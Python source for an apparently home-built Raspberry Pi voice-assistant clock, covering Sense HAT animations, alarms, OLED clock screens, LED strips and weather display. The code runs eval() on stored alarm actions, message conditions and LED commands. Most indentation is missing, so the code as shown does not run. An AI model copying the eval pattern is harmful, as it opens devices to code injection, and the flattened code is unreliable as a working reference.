def logo():
t = 0.05
b = (0,0,255)
r = (255,0,0)
j = (255,255,0)
v = (0,255,0)
hat.clear()
hat.set_pixel(2,2,b)
hat.set_pixel(5,2,r)
hat.set_pixel(5,5,j)
hat.set_pixel(2,5,v)
time.sleep(t)
hat.clear()
hat.set_pixel(3,2,b)
hat.set_pixel(5,3,r)
hat.set_pixel(4,5,j)
hat.set_pixel(2,4,v)
time.sleep(t)
hat.clear()
hat.set_pixel(4,2,b)
hat.set_pixel(5,4,r)
hat.set_pixel(3,5,j)
hat.set_pixel(2,3,v)
time.sleep(t)
hat.clear()
hat.set_pixel(2,2,v)
hat.set_pixel(5,2,b)
hat.set_pixel(5,5,r)
hat.set_pixel(2,5,j)
time.sleep(t)
hat.clear()
hat.set_pixel(3,2,v)
hat.set_pixel(5,3,b)
hat.set_pixel(4,5,r)
hat.set_pixel(2,4,j)
time.sleep(t)
hat.clear()
hat.set_pixel(4,2,v)
hat.set_pixel(5,4,b)
hat.set_pixel(3,5,r)
hat.set_pixel(2,3,j)
time.sleep(t)
hat.clear()
hat.set_pixel(2,2,j)
hat.set_pixel(5,2,v)
hat.set_pixel(5,5,b)
hat.set_pixel(2,5,r)
time.sleep(t)
hat.clear()
hat.set_pixel(3,2,j)
hat.set_pixel(5,3,v)
hat.set_pixel(4,5,b)
hat.set_pixel(2,4,r)
time.sleep(t)
hat.clear()
hat.set_pixel(4,2,j)
hat.set_pixel(5,4,v)
hat.set_pixel(3,5,b)
hat.set_pixel(2,3,r)
time.sleep(t)
hat.clear()
hat.set_pixel(2,2,r)
hat.set_pixel(5,2,j)
hat.set_pixel(5,5,v)
hat.set_pixel(2,5,b)
time.sleep(t)
hat.clear()
hat.set_pixel(3,2,r)
hat.set_pixel(5,3,j)
hat.set_pixel(4,5,v)
hat.set_pixel(2,4,b)
time.sleep(t)
hat.clear()
hat.set_pixel(4,2,r)
hat.set_pixel(5,4,j)
hat.set_pixel(3,5,v)
hat.set_pixel(2,3,b)
time.sleep(t)
hat.clear()
hat.set_pixel(2,2,b)
hat.set_pixel(5,2,r)
hat.set_pixel(5,5,j)
hat.set_pixel(2,5,v)
def logo_high():
t = 0.01
hat.clear()
i = 0
while i < 226:
b = (0,0,i)
r = (i,0,0)
j = (i,i,0)
v = (0,i,0)
hat.set_pixel(2,2,b)
hat.set_pixel(5,2,r)
hat.set_pixel(5,5,j)
hat.set_pixel(2,5,v)
time.sleep(t)
i = i + 15
def logo_low():
t = 0.01
i = 225
while i > -1:
b = (0,0,i)
r = (i,0,0)
j = (i,i,0)
v = (0,i,0)
hat.set_pixel(2,2,b)
hat.set_pixel(5,2,r)
hat.set_pixel(5,5,j)
hat.set_pixel(2,5,v)
time.sleep(t)
i = i - 15
hat.clear()
def sound():
subprocess.Popen(["aplay", "~/google-assistant/src/sound/bip.wav"], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
def volume_set(volume):
os.system("amixer set 'Master' "+str(volume)+"%")
def volume_get():
vol = os.popen("amixer get 'Master' | grep 'Front Right'").read()
vol = vol.split("[")[1]
vol = vol.replace("%] ","")
vol = int(vol)
return vol
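    # Speak `words` with gTTS and mpg123, then report the response through the assistant display events.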
def say(self, words, language,save=True):
if not words == '':
gTTS(text=words, lang=language).save("~/google-assistant/src/say.mp3")
            # run the "responding started" display event in a background thread instead of calling it inline
            threading.Thread(target=self.process_event, args=('ON_RESPONDING_STARTED:\n {"is_error_response": false}',)).start()
os.system("mpg123 -q ~/google-assistant/src/say.mp3")
os.remove("~/google-assistant/src/say.mp3")
if save:
self.text_say = words
self.process_event('ON_RESPONDING_FINISHED')
self.process_event('ON_RENDER_RESPONSE:\n {"text": "' + words + '", "type": 0}')
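    # Retry the OLED refresh a few times, swallowing transient OSErrors from the display.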
def refrech_error():
try:
disp.display()
except OSError:
time.sleep(0.1)
try:
disp.display()
except OSError:
time.sleep(0.1)
try:
disp.display()
except OSError:
pass
def aff_clean(self,cl):
if cl:
self.veil = settings.get("Time stand by")*2+1
self.affichage = ''
time.sleep(0.3)
disp.clear()
Myassistant.refrech_error()
else:
if self.affichage == '':
self.affichage = 'heure'
Myassistant.reload_aff_heure_st(self)
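    # Stand-by clock: draw the time at a random position (which should limit OLED burn-in) and add the alarm icon when an alarm is coming up.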
def reload_aff_heure_st(self):
image = Image.new('1', (disp.width,disp.height))
draw = ImageDraw.Draw(image)
listal = []
alfortom = False
i = len(self.act_cron)-1
while i > -1:
if 'Myassistant.alarm_dring(self)#cantdel' == self.act_cron[i][3]:
listal.append(self.act_cron[i])
i = i - 1
if int(time.strftime("%H")) > 17:
ood = Myassistant.ad_day(time.strftime("%A"),1)
for li in listal:
if str(ood) == li[0] or '-' == li[0]:
if int(li[1]) < 12:
alfortom = True
for li in listal:
if time.strftime("%A") == li[0] or '-' == li[0]:
if int(time.strftime("%H")) < int(li[1]):
alfortom = True
elif int(time.strftime("%H")) == int(li[1]):
if int(time.strftime("%M")) < int(li[2]):
alfortom = True
if alfortom:
alarm = Image.open('~/google-assistant/src/images/clock/alarme.jpg')
alarm = alarm.resize((10,9))
alarm = ImageOps.invert(alarm)
o = random.randint(1,4)
if o == 1:
image.paste(alarm, (random.randint(0,119),random.randint(0,7)))
elif o == 2:
image.paste(alarm, (random.randint(0,6),random.randint(0,55)))
elif o == 3:
image.paste(alarm, (random.randint(112,119),random.randint(0,55)))
elif o == 4:
image.paste(alarm, (random.randint(0,119),random.randint(48,55)))
draw.text((random.randint(15,47),random.randint(14,39)), str(time.strftime("%H")), font=font, fill=255)
draw.text((random.randint(59,101),random.randint(14,39)), str(time.strftime("%M")), font=font, fill=255)
else:
draw.text((random.randint(0,47),random.randint(0,55)), str(time.strftime("%H")), font=font, fill=255)
draw.text((random.randint(59,116),random.randint(0,55)), str(time.strftime("%M")), font=font, fill=255)
disp.image(image)
Myassistant.refrech_error()
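    # Evaluate a stored cron action unless it is flagged #disable; the #cantdel marker is only a deletion guard and is stripped first.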
def exec_error(self,ex):
try:
ex = str(ex)
if not '#disable' in ex:
if '#cantdel' in ex:
ex = ex.replace("#cantdel","")
eval(ex)
print('Action cron : "' + ex + '"')
except:
print('Failed to execute : "' + ex + '"')
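    # Switch the OLED to the previous or next screen of the custom menu.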
def execute_next(self,direc):
e = settings.get("Custom menu")
i = len(e)-1
while i > -1:
if not settings.get("Led strips"):
if 'Led strip' == e[i]:
del e[i]
elif not settings.get("Music"):
if 'Music' == e[i]:
del e[i]
elif not settings.get("Weather"):
if 'Weather' == e[i]:
del e[i]
i = i - 1
if self.affichage == 'heure total':
fghd = 'Clock'
elif self.affichage == 'led strip':
fghd = 'Led strip'
elif self.affichage == 'météo':
fghd = 'Weather'
elif self.affichage == 'music':
fghd = 'Music'
k = e.index(str(fghd))
if direc == 'left':
if k - 1 < 0:
k = len(e)-1
else:
k = k - 1
else:
if k + 1 > len(e)-1:
k = 0
else:
k = k + 1
disp.clear()
Myassistant.refrech_error()
while not len(self.buton) == 0:
del self.buton[0]
if e[k] == 'Clock':
threading.Timer(0, Myassistant.aff_heure,[self]).start()
elif e[k] == 'Weather':
threading.Timer(0, Myassistant.aff_meteo,[self]).start()
elif e[k] == 'Music':
threading.Timer(0, Myassistant.aff_music,[self]).start()
elif e[k] == 'Led strip':
threading.Timer(0, Myassistant.aff_led_strip,[self]).start()
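    # Persist the var_save dictionary as "key : value" lines in save.yaml.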
def save_var_in_file(self):
w = []
for u in self.var_save:
w.append(str(str(u)+" : "+str(self.var_save.get(str(u)))))
w = "\n".join(w)
fichier = open("~/google-assistant/src/save.yaml", "w")
fichier.write(w)
fichier.close()
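    # While the alarm rings, raise the volume one step every two seconds, then restore the previous level.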
def adprogvolume(self):
vol = Myassistant.volume_get()
vol1 = vol
while self.al:
vol1 = vol1 + 1
Myassistant.volume_set(vol1)
time.sleep(2)
Myassistant.volume_set(vol)
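    # Safety timer: stop the alarm after about five minutes and switch the alarm LEDs off.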
def stop_al_time(self):
l = 300
while self.al :
if l < 1 :
self.al = False
os.system('sudo killall mpg123')
if settings.get("Led strips"):
try:
led = flux_led.__main__
for adresr in self.var_save.get("Alarm led")[0]:
wifiled = listwifi[adresr]
wifiled.turnOff()
except BrokenPipeError:
print('Failed : "led strip"')
else:
l = l - 1
time.sleep(1)
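    # Ring the alarm: pause VLC, show the clock, light the configured LED strips and loop the alarm sound until it is dismissed.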
def alarm_dring(self):
self.al = True
vlc.pause_vlc()
if settings.get("Sense hat"):
Myassistant.logo_high()
self.veil = settings.get("Time stand by")*2+1
if not self.affichage == 'heure total':
if self.affichage == 'heure' or self.affichage == '':
self.affichage = 'heure total'
threading.Timer(0, Myassistant.aff_heure,[self]).start()
threading.Timer(0, Myassistant.butonshearch,[self]).start()
else:
threading.Timer(0, Myassistant.aff_heure,[self]).start()
if settings.get("Led strips"):
if not str(self.var_save.get("Alarm led")) == 'None':
try:
led = flux_led.__main__
for adresr in self.var_save.get("Alarm led")[0]:
wifiled = listwifi[adresr]
if not wifiled.isOn():
wifiled.turnOn()
time.sleep(1)
eval('wifiled.'+str(self.var_save.get("Alarm led")[1]))
except BrokenPipeError:
print('Failed : "led strip"')
threading.Timer(5, Myassistant.adprogvolume,[self]).start()
threading.Timer(0, Myassistant.stop_al_time,[self]).start()
if self.var_save.get("Alarm sound") == 'Def':
while self.al:
os.system("mpg123 -q ~/google-assistant/src/sound/alarm.mp3")
else:
fileplay = self.var_save.get("Alarm sound")
if os.path.isdir(fileplay):
files = []
for path, dirs, file in os.walk(fileplay):
for filename in file:
files.append(path + '/' + filename)
i = len(files) - 1
while i > -1 :
if not ".mp3" in str(files[i]) :
del files[i]
i = i - 1
if not len(files) == 0 :
sefulfiles = []
uuf = files
while len(uuf) > 0:
u = random.randint(0,len(uuf)-1)
sefulfiles.append(uuf[u])
del uuf[u]
dfgh = True
while self.al and dfgh:
p = subprocess.Popen(['mpg123', '-q', str(sefulfiles[random.randint(0,len(sefulfiles)-1)])], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = p.communicate()
if not str(err) == "b''":
dfgh = False
else:
dfgh = True
while self.al and dfgh:
os.system("mpg123 -q "+str(fileplay))
p = subprocess.Popen(['mpg123', '-q', str(fileplay)], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = p.communicate()
if not str(err) == "b''":
dfgh = False
while self.al:
os.system("mpg123 -q ~/google-assistant/src/sound/alarm.mp3")
self.al = False
self.veil = 0
if settings.get("Sense hat"):
Myassistant.logo_low()
vlc.resume_vlc()
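    # Button-driven menu to create, list, change, remove, enable/disable and customise alarms.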
def alarm_action(self):
set_alarm_list = [['Set new alarm','newalarm'],
['Get alarm','getal'],
['Change alarm','changealarm'],
['Remove alarm',[[['All','removeall'],
['Specific alarm','removespec'],
['Exit','exit']],'remove']],
                          ['Set alarm status',[[['All','actall'],
['Specific alarm','actspec'],
['Exit','exit']],'statut']],
                          ['Custom alarm','costumalarm'],
['Exit','exit']]
setal = Myassistant.select_list(self,set_alarm_list,'alarm menu')
tmasone = Myassistant.ad_min_hour(time.strftime("%H"),time.strftime("%M"),1)
if setal == 'newalarm':
selecttime = Myassistant.select_time(self,'--', '--', '-', 'new alarm',True)
if not (selecttime[0] == '--' or selecttime[1] == '--'):
self.act_cron.append([selecttime[2],selecttime[0],selecttime[1],'Myassistant.alarm_dring(self)#cantdel'])
elif setal == 'removeall':
i = len(self.act_cron)-1
while i > -1:
if 'Myassistant.alarm_dring(self)#cantdel' in self.act_cron[i][3]:
del self.act_cron[i]
i = i - 1
elif setal == 'removespec':
i = 0
alarmcrons = [['All','all']]
while i < len(self.act_cron):
if 'Myassistant.alarm_dring(self)#cantdel' in self.act_cron[i][3]:
if 'Myassistant.alarm_dring(self)#cantdel#disable' == self.act_cron[i][3]:
if self.act_cron[i][0] == '-':
                            alarmcrons.append(['(Disabled) Alarm at '+self.act_cron[i][1]+':'+self.act_cron[i][2],str(i)])
                        else:
                            alarmcrons.append(['(Disabled) Alarm on '+self.act_cron[i][0]+' at '+self.act_cron[i][1]+':'+self.act_cron[i][2],str(i)])
else:
if self.act_cron[i][0] == '-':
alarmcrons.append(['Alarm at '+self.act_cron[i][1]+':'+self.act_cron[i][2],str(i)])
else:
alarmcrons.append(['Alarm on '+self.act_cron[i][0]+' at '+self.act_cron[i][1]+':'+self.act_cron[i][2],str(i)])
i = i + 1
alarmcrons.append(['Exit','exit'])
delalarm = Myassistant.select_list(self,alarmcrons,'select alarm')
if delalarm == 'all':
i = len(self.act_cron)-1
while i > -1:
if 'Myassistant.alarm_dring(self)#cantdel' in self.act_cron[i][3]:
del self.act_cron[i]
i = i - 1
elif not delalarm == 'exit' and not delalarm == None:
del self.act_cron[int(delalarm)]
elif setal == 'changealarm':
i = 0
alarmcrons = []
while i < len(self.act_cron):
if 'Myassistant.alarm_dring(self)#cantdel' in self.act_cron[i][3]:
if 'Myassistant.alarm_dring(self)#cantdel#disable' == self.act_cron[i][3]:
if self.act_cron[i][0] == '-':
                            alarmcrons.append(['(Disabled) Alarm at '+self.act_cron[i][1]+':'+self.act_cron[i][2],str(i)])
                        else:
                            alarmcrons.append(['(Disabled) Alarm on '+self.act_cron[i][0]+' at '+self.act_cron[i][1]+':'+self.act_cron[i][2],str(i)])
else:
if self.act_cron[i][0] == '-':
alarmcrons.append(['Alarm at '+self.act_cron[i][1]+':'+self.act_cron[i][2],str(i)])
else:
alarmcrons.append(['Alarm on '+self.act_cron[i][0]+' at '+self.act_cron[i][1]+':'+self.act_cron[i][2],str(i)])
i = i + 1
alarmcrons.append(['Exit','exit'])
delalarm = Myassistant.select_list(self,alarmcrons,'select alarm')
if not delalarm == 'exit' and not delalarm == None:
selecttime = Myassistant.select_time(self,self.act_cron[int(delalarm)][1],self.act_cron[int(delalarm)][2],self.act_cron[int(delalarm)][0], 'new time',True)
if not (selecttime[0] == '--' or selecttime[1] == '--'):
self.act_cron[int(delalarm)] = [selecttime[2],selecttime[0],selecttime[1],'Myassistant.alarm_dring(self)#cantdel']
else:
del self.act_cron[int(delalarm)]
elif setal == 'getal':
i = 0
alarmcrons = []
while i < len(self.act_cron):
if 'Myassistant.alarm_dring(self)#cantdel' in self.act_cron[i][3]:
if 'Myassistant.alarm_dring(self)#cantdel#disable' == self.act_cron[i][3]:
if self.act_cron[i][0] == '-':
                            alarmcrons.append(['(Disabled) Alarm at '+self.act_cron[i][1]+':'+self.act_cron[i][2],str(i)])
                        else:
                            alarmcrons.append(['(Disabled) Alarm on '+self.act_cron[i][0]+' at '+self.act_cron[i][1]+':'+self.act_cron[i][2],str(i)])
else:
if self.act_cron[i][0] == '-':
alarmcrons.append(['Alarm at '+self.act_cron[i][1]+':'+self.act_cron[i][2],str(i)])
else:
alarmcrons.append(['Alarm on '+self.act_cron[i][0]+' at '+self.act_cron[i][1]+':'+self.act_cron[i][2],str(i)])
i = i + 1
alarmcrons.append(['Exit','exit'])
delalarm = Myassistant.select_list(self,alarmcrons,'alarm')
elif setal == 'costumalarm':
if settings.get("Led strips"):
                vffffffv = Myassistant.select_list(self,[['Led strip','led'],['Sound','sound'],['Exit','exit']],'custom')
if vffffffv == 'sound':
choic = Myassistant.select_list(self,[['Default','def'],['File','file'],['Exit','exit']],'alarm sound')
if choic == 'def':
self.var_save["Alarm sound"] = 'Def'
elif choic == 'file':
mscel = Myassistant.select_list(self,[['Radios','radios'],['File','file'],['Exit','exit']],'music')
if mscel == 'radios':
radiona = []
for hgj in settings.get("Radios"):
radiona.append(hgj)
j = Myassistant.select_list(self,radiona,'Radios')
elif mscel == 'file':
j = Myassistant.select_path(self,settings.get("Path to your music"),True)
if not mscel == 'exit' and not mscel == None and not j == None:
self.var_save["Alarm sound"] = str(j)
elif vffffffv == 'led':
choic = Myassistant.select_list(self,[['Color','color'],['None','nones'],['Exit','exit']],'alarm led')
if choic == 'color':
coolor = Myassistant.select_led_strip_color_all(self)
if not '[' in str(coolor[0]):
coolor[0] = [str(coolor[0])]
self.var_save["Alarm led"] = coolor
elif choic == 'nones':
self.var_save["Alarm led"] = 'None'
else:
choic = Myassistant.select_list(self,[['Default','def'],['File','file'],['Exit','exit']],'alarm sound')
if choic == 'def':
self.var_save["Alarm sound"] = 'Def'
elif choic == 'file':
mscel = Myassistant.select_list(self,[['Radios','radios'],['File','file'],['Exit','exit']],'music')
if mscel == 'radios':
radiona = []
for hgj in settings.get("Radios"):
radiona.append(hgj)
j = Myassistant.select_list(self,radiona,'Radios')
elif mscel == 'file':
j = Myassistant.select_path(self,settings.get("Path to your music"),True)
if not mscel == 'exit' and not mscel == None and not j == None:
self.var_save["Alarm sound"] = str(j)
elif setal == 'actall':
            choic = Myassistant.select_list(self,[['Enable','en'],['Disable','di'],['Exit','exit']],'select status')
if choic == 'en':
i = 0
while i < len(self.act_cron):
if 'Myassistant.alarm_dring(self)#cantdel' in self.act_cron[i][3]:
if 'Myassistant.alarm_dring(self)#cantdel#disable' == self.act_cron[i][3]:
self.act_cron[i][3] = 'Myassistant.alarm_dring(self)#cantdel'
i = i + 1
elif choic == 'di':
i = 0
while i < len(self.act_cron):
if 'Myassistant.alarm_dring(self)#cantdel' in self.act_cron[i][3]:
if not 'Myassistant.alarm_dring(self)#cantdel#disable' == self.act_cron[i][3]:
self.act_cron[i][3] = 'Myassistant.alarm_dring(self)#cantdel#disable'
i = i + 1
elif setal == 'actspec':
i = 0
alarmcrons = [['All','all']]
while i < len(self.act_cron):
if 'Myassistant.alarm_dring(self)#cantdel' in self.act_cron[i][3]:
if 'Myassistant.alarm_dring(self)#cantdel#disable' == self.act_cron[i][3]:
if self.act_cron[i][0] == '-':
                            alarmcrons.append(['(Disabled) Alarm at '+self.act_cron[i][1]+':'+self.act_cron[i][2],str(i)])
                        else:
                            alarmcrons.append(['(Disabled) Alarm on '+self.act_cron[i][0]+' at '+self.act_cron[i][1]+':'+self.act_cron[i][2],str(i)])
else:
if self.act_cron[i][0] == '-':
alarmcrons.append(['Alarm at '+self.act_cron[i][1]+':'+self.act_cron[i][2],str(i)])
else:
alarmcrons.append(['Alarm on '+self.act_cron[i][0]+' at '+self.act_cron[i][1]+':'+self.act_cron[i][2],str(i)])
i = i + 1
alarmcrons.append(['Exit','exit'])
delalarm = Myassistant.select_list(self,alarmcrons,'select alarm')
if delalarm == 'all':
                choic = Myassistant.select_list(self,[['Enable','en'],['Disable','di'],['Exit','exit']],'select status')
if choic == 'en':
i = 0
while i < len(self.act_cron):
if 'Myassistant.alarm_dring(self)#cantdel' in self.act_cron[i][3]:
if 'Myassistant.alarm_dring(self)#cantdel#disable' == self.act_cron[i][3]:
self.act_cron[i][3] = 'Myassistant.alarm_dring(self)#cantdel'
i = i + 1
elif choic == 'di':
i = 0
while i < len(self.act_cron):
if 'Myassistant.alarm_dring(self)#cantdel' in self.act_cron[i][3]:
if not 'Myassistant.alarm_dring(self)#cantdel#disable' == self.act_cron[i][3]:
self.act_cron[i][3] = 'Myassistant.alarm_dring(self)#cantdel#disable'
i = i + 1
elif not delalarm == 'exit' and not delalarm == None:
if 'Myassistant.alarm_dring(self)#cantdel' in self.act_cron[int(delalarm)][3]:
if 'Myassistant.alarm_dring(self)#cantdel#disable' == self.act_cron[int(delalarm)][3]:
self.act_cron[int(delalarm)][3] = 'Myassistant.alarm_dring(self)#cantdel'
else:
self.act_cron[int(delalarm)][3] = 'Myassistant.alarm_dring(self)#cantdel#disable'
i = 0
alarim = []
while i < len(self.act_cron):
if 'Myassistant.alarm_dring(self)#cantdel' in self.act_cron[i][3]:
alarim.append(self.act_cron[i])
i = i + 1
if str(alarim) == '[]':
alarim = 'None'
self.var_save["Alarm cron"] = alarim
Myassistant.save_var_in_file(self)
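    # Main half-second loop: run due cron actions, refresh the stand-by clock, fetch the hourly forecast and handle stand-by and buttons.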
def main_heure(self):
if time.strftime("%S") == '00':
stime = [str(time.strftime("%A")),str(time.strftime("%H")),str(time.strftime("%M"))]
i = len(self.act_cron) - 1
while i > -1:
if self.act_cron[i][0] == '-' or self.act_cron[i][0] == stime[0]:
if self.act_cron[i][1] == '--' or self.act_cron[i][1] == stime[1]:
if self.act_cron[i][2] == '--' or self.act_cron[i][2] == stime[2]:
threading.Timer(0,Myassistant.exec_error,[self,self.act_cron[i][3]]).start()
i = i - 1
if self.affichage == 'heure' :
Myassistant.reload_aff_heure_st(self)
if time.strftime("%M") == '00' :
if Myassistant.have_network(time.strftime("%H"),time.strftime("%M")):
try:
fio.get_forecast(latitude=coutry[1],longitude=coutry[0])
except:
print('Failed to get forecast')
time.sleep(0.5)
if self.veil == settings.get("Time stand by")*2:
self.affichage = 'heure'
time.sleep(0.5)
disp.clear()
Myassistant.refrech_error()
Myassistant.reload_aff_heure_st(self)
self.veil = self.veil + 1
elif self.veil < settings.get("Time stand by")*2:
self.veil = self.veil + 1
threading.Timer(0.5, Myassistant.main_heure,[self]).start()
if GPIO.input(bsquare) == 0 and GPIO.input(bround) == 0 and GPIO.input(brigt) == 0 and GPIO.input(bleft) == 0:
self.affichage = 'shutdown'
self.veil = settings.get("Time stand by")*2+1
if settings.get("Sense hat"):
hat.clear()
disp.clear()
Myassistant.refrech_error()
thetime = 40
while thetime > 0:
time.sleep(0.1)
                # check all four buttons; the original line tested bround twice and never bsquare
                if GPIO.input(bsquare) == 1 or GPIO.input(bround) == 1 or GPIO.input(brigt) == 1 or GPIO.input(bleft) == 1:
disp.clear()
Myassistant.refrech_error()
os.system('sudo reboot')
thetime = thetime - 1
disp.clear()
Myassistant.refrech_error()
os.system('sudo halt')
elif (GPIO.input(bsquare) == 0 or GPIO.input(bround) == 0 or GPIO.input(brigt) == 0 or GPIO.input(bleft) == 0) and (self.affichage == 'heure' or self.affichage == ''):
self.veil = 0
self.affichage = 'heure total'
disp.clear()
Myassistant.refrech_error()
time.sleep(0.3)
threading.Timer(0, Myassistant.aff_heure,[self]).start()
threading.Timer(0, Myassistant.butonshearch,[self]).start()
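    # Full clock screen: large digits, date, messages or CPU/MEM load, December snow effect and alarm icon.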
def aff_heure(self):
direc = 0
x = 4
self.affichage = 'heure total'
decemb = []
alblink = 0
day = time.strftime("%a")
mon = time.strftime("%b")
if time.strftime("%B") == "December" :
i = random.randint(64,320)
while i > 0:
decemb.append([random.randint(0,127),random.randint(0,63)])
i = i - 1
for done_i in decemb:
draw.point((done_i[0],done_i[1]),fill=255)
listal = []
alfortom = False
i = len(self.act_cron)-1
while i > -1:
if 'Myassistant.alarm_dring(self)#cantdel' == self.act_cron[i][3]:
listal.append(self.act_cron[i])
i = i - 1
if int(time.strftime("%H")) > 17:
ood = Myassistant.ad_day(time.strftime("%A"),1)
for li in listal:
if str(ood) == li[0] or '-' == li[0]:
if int(li[1]) < 12:
alfortom = True
for li in listal:
if time.strftime("%A") == li[0] or '-' == li[0]:
if int(time.strftime("%H")) < int(li[1]):
alfortom = True
elif int(time.strftime("%H")) == int(li[1]):
if int(time.strftime("%M")) < int(li[2]):
alfortom = True
while self.affichage == 'heure total' :
image = Image.new('1', (disp.width,disp.height))
draw = ImageDraw.Draw(image)
heure = time.strftime("%H")
minute = time.strftime("%M")
chiffre1 = Image.open('~/google-assistant/src/images/clock/' + str(heure[0]) + '.jpg')
chiffre1 = chiffre1.resize((35,35))
chiffre1 = ImageOps.invert(chiffre1)
image.paste(chiffre1, (-4,0))
chiffre2 = Image.open('~/google-assistant/src/images/clock/' + str(heure[1]) + '.jpg')
chiffre2 = chiffre2.resize((35,35))
chiffre2 = ImageOps.invert(chiffre2)
image.paste(chiffre2, (27,0))
chiffre3 = Image.open('~/google-assistant/src/images/clock/' + str(minute[0]) + '.jpg')
chiffre3 = chiffre3.resize((35,35))
chiffre3 = ImageOps.invert(chiffre3)
image.paste(chiffre3, (66,0))
chiffre4 = Image.open('~/google-assistant/src/images/clock/' + str(minute[1]) + '.jpg')
chiffre4 = chiffre4.resize((35,35))
chiffre4 = ImageOps.invert(chiffre4)
image.paste(chiffre4, (97,0))
if int(time.strftime("%S")) % 2 == 0 :
draw.line((62,12,64,12), fill=255)
draw.line((62,14,64,14), fill=255)
draw.line((62,18,64,18), fill=255)
draw.line((62,20,64,20), fill=255)
draw.line((0,34,54,34), fill=255)
draw.line((0,36,54,36), fill=255)
draw.line((0,38,54,38), fill=255)
draw.line((0,40,54,40), fill=255)
draw.text((58,32), time.strftime("%S"), font=font, fill=225)
draw.line((72,34,128,34), fill=255)
draw.line((72,36,128,36), fill=255)
draw.line((72,38,128,38), fill=255)
draw.line((72,40,128,40), fill=255)
if time.strftime("%S") == '00' :
day = time.strftime("%a")
mon = time.strftime("%b")
if time.strftime("%B") == "December" :
mon = 'Dec'
listal = []
alfortom = False
i = len(self.act_cron)-1
while i > -1:
if 'Myassistant.alarm_dring(self)#cantdel' == self.act_cron[i][3]:
listal.append(self.act_cron[i])
i = i - 1
if int(time.strftime("%H")) > 17:
ood = Myassistant.ad_day(time.strftime("%A"),1)
for li in listal:
if str(ood) == li[0] or '-' == li[0]:
if int(li[1]) < 12:
alfortom = True
for li in listal:
if time.strftime("%A") == li[0] or '-' == li[0]:
if int(time.strftime("%H")) < int(li[1]):
alfortom = True
elif int(time.strftime("%H")) == int(li[1]):
if int(time.strftime("%M")) < int(li[2]):
alfortom = True
draw.text(((128 - (len(day + time.strftime(" %d ") + mon + time.strftime(" %Y")) * 6)) / 2,42),day + time.strftime(" %d ") + mon + time.strftime(" %Y"), font=font, fill=225)
if settings.get("Messages"):
goder = True
try:
for actmess in settings.get("Messages configuration"):
if eval(actmess[0]):
goder = False
if len(actmess[1]) * 6 > 128 :
if direc == 0 :
if len(actmess[1]) * 6 + x > 128 :
x = x - 4
else :
direc = 1
else :
x = x + 4
if x > 3 :
direc = 0
draw.rectangle((0, 53, 127, 63), outline=0, fill=0)
draw.text((x,53),actmess[1], font=font, fill=225)
else:
draw.rectangle((0, 53, 127, 63), outline=0, fill=0)
draw.text(((128 - (len(actmess[1]) * 6)) / 2,53),actmess[1], font=font, fill=225)
except:
print('Failed print message')
draw.rectangle((0, 53, 127, 63), outline=0, fill=0)
resources = 'CPU:'+str(psutil.cpu_percent())+'% MEM:'+str(psutil.virtual_memory().percent)+'%'
draw.text(((128 - (len(resources) * 6)) / 2,53),resources, font=font, fill=225)
if goder:
draw.rectangle((0, 53, 127, 63), outline=0, fill=0)
resources = 'CPU:'+str(psutil.cpu_percent())+'% MEM:'+str(psutil.virtual_memory().percent)+'%'
draw.text(((128 - (len(resources) * 6)) / 2,53),resources, font=font, fill=225)
else:
draw.rectangle((0, 53, 127, 63), outline=0, fill=0)
resources = 'CPU:'+str(psutil.cpu_percent())+'% MEM:'+str(psutil.virtual_memory().percent)+'%'
draw.text(((128 - (len(resources) * 6)) / 2,53),resources, font=font, fill=225)
if self.al:
if alblink < 3:
alarm = Image.open('~/google-assistant/src/images/clock/alarme.jpg')
alarm = alarm.resize((10,9))
alarm = ImageOps.invert(alarm)
image.paste(alarm, (59,0))
alblink = alblink + 1
else:
if alblink > 4:
alblink = 0
else:
alblink = alblink + 1
elif alfortom:
alarm = Image.open('~/google-assistant/src/images/clock/alarme.jpg')
alarm = alarm.resize((10,9))
alarm = ImageOps.invert(alarm)
image.paste(alarm, (59,0))
if mon == 'Dec':
if not len(decemb) == 0:
i = len(decemb)-1
while i > -1:
if decemb[i][1]+1 > 63:
del decemb[i]
else:
if decemb[i][0] % 2 == 0:
decemb[i] = [decemb[i][0]+1,decemb[i][1]+1]
else:
decemb[i] = [decemb[i][0]-1,decemb[i][1]+1]
i = i - 1
i = random.randint(0,5)
while i > 0:
decemb.append([random.randint(0,127),0])
i = i - 1
else:
decemb = []
i = random.randint(64,320)
while i > 0:
decemb.append([random.randint(0,127),random.randint(0,63)])
i = i - 1
for done_i in decemb:
draw.point((done_i[0],done_i[1]),fill=255)
disp.image(image)
Myassistant.refrech_error()
buton = 20000
while buton > 0 and self.affichage == 'heure total':
if not len(self.buton) == 0:
self.veil = 0
if self.al == True:
del self.buton[0]
self.al = False
os.system('sudo killall mpg123')
elif self.buton[0] == 0 or self.buton[0] == 1:
del self.buton[0]
if settings.get("Alarm"):
Myassistant.alarm_action(self)
disp.clear()
Myassistant.refrech_error()
time.sleep(0.3)
while not len(self.buton) == 0:
del self.buton[0]
listal = []
alfortom = False
i = len(self.act_cron)-1
while i > -1:
if 'Myassistant.alarm_dring(self)#cantdel' == self.act_cron[i][3]:
listal.append(self.act_cron[i])
i = i - 1
if int(time.strftime("%H")) > 17:
ood = Myassistant.ad_day(time.strftime("%A"),1)
for li in listal:
if str(ood) == li[0] or '-' == li[0]:
if int(li[1]) < 12:
alfortom = True
for li in listal:
if time.strftime("%A") == li[0] or '-' == li[0]:
if int(time.strftime("%H")) < int(li[1]):
alfortom = True
elif int(time.strftime("%H")) == int(li[1]):
if int(time.strftime("%M")) < int(li[2]):
alfortom = True
elif self.buton[0] == 2:
del self.buton[0]
Myassistant.execute_next(self,'right')
elif self.buton[0] == 3:
del self.buton[0]
Myassistant.execute_next(self,'left')
self.veil = 0
if not len(self.buton) == 0:
buton = 5
else:
buton = 0
buton = buton - 1
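    # Weather screens built from the forecast data: current conditions, a six-day grid and a single-day view.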
def aff_meteo(self):
self.affichage = 'météo'
if Myassistant.have_network(time.strftime("%H"),time.strftime("%M")):
try:
fio.get_forecast(latitude=coutry[1],longitude=coutry[0])
except:
print('Failed to get forecast')
afmete = 'currently'
direc = 0
x = 4
if fio.has_currently() is True:
currently = FIOCurrently.FIOCurrently(fio)
else:
self.veil = 0
threading.Timer(0, Myassistant.aff_heure,[self]).start()
print('Failed : "weather"')
if fio.has_daily() is True:
daily = FIODaily.FIODaily(fio)
else:
self.veil = 0
threading.Timer(0, Myassistant.aff_heure,[self]).start()
print('Failed : "weather"')
if daily.days() > 0:
daysel = 1
else:
daysel = 0
